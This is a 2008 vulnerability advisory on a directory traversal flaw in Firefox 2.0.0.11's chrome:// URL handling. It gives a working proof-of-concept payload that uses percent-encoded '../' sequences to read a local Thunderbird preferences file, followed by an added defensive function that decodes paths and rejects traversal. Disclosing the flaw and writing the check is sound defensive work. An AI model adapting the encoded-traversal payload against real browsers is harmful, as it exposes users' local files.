Firefox doesn't properly handle escaped characters. It is possible to load any JavaScript file on a victim's machine. This attack is similar to previously disclosed vulnerabilities but is not constrained to basic Firefox files.
Credit:
The information has been provided by Gerry Eisenhaur.
The original article can be found at: http://www.hiredhacker.com/2008/01/19/firefox-chrome-url-handling-directory-traversal/
Vulnerable Systems:
* Firefox version 2.0.0.11
To exploit this the victim needs to have an extension installed that does not store its contents in a jar archive (such as the Download Statusbar). Gerry created a demo that will read the Mozilla Thunderbird preferences file all.js (C:\Program Files\Mozilla Thunderbird\greprefs\all.js).
This looks very interesting and may have bigger potential, but for now, it's just another information disclosure.
Proof of concept:
<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script>
<script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e
%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files
%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script>
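
Defensive check (added example, not part of the original advisory and not Mozilla's code): the proof of concept works because the "../" sequences are percent-encoded, so a check has to decode the path before resolving it. The function name checkChromeUrl and the package name examplepkg are hypothetical, and the sample URLs are constructed.

```javascript
// Decide whether a chrome://package/type/path URL stays inside its package
// directory once percent-escapes are decoded. Hypothetical helper for
// illustration; conservative: it also decodes nested encodings (%252e).
function checkChromeUrl(url) {
  const m = /^chrome:\/\/([^\/]+)\/([^\/]+)\/(.*)$/i.exec(url);
  if (!m) return { ok: false, reason: 'not a chrome://package/type/path URL' };

  let path = m[3];
  for (let round = 0; ; round++) {
    if (round === 4) return { ok: false, reason: 'excessive encoding depth' };
    let decoded;
    try {
      decoded = decodeURIComponent(path);
    } catch (e) {
      return { ok: false, reason: 'malformed percent-encoding' };
    }
    if (decoded === path) break; // stable: nothing left to decode
    path = decoded;
  }

  // Resolve segments; backslash counts as a separator for Windows paths.
  const stack = [];
  for (const seg of path.split(/[\/\\]/)) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') {
      if (stack.length === 0) {
        return { ok: false, reason: 'path escapes package root' };
      }
      stack.pop();
    } else {
      stack.push(seg);
    }
  }
  return { ok: true, resolved: stack.join('/') };
}

// Constructed sample inputs.
const samples = [
  'chrome://examplepkg/content/overlay.js',
  'chrome://examplepkg/content/sub/%2e%2e/overlay.js',
  'chrome://examplepkg/content/%2e%2e%2f%2e%2e%2fother%20dir%2ffile.js',
  'chrome://examplepkg/content/%252e%252e%252ffile.js',
];
for (const s of samples) console.log(s, JSON.stringify(checkChromeUrl(s)));
```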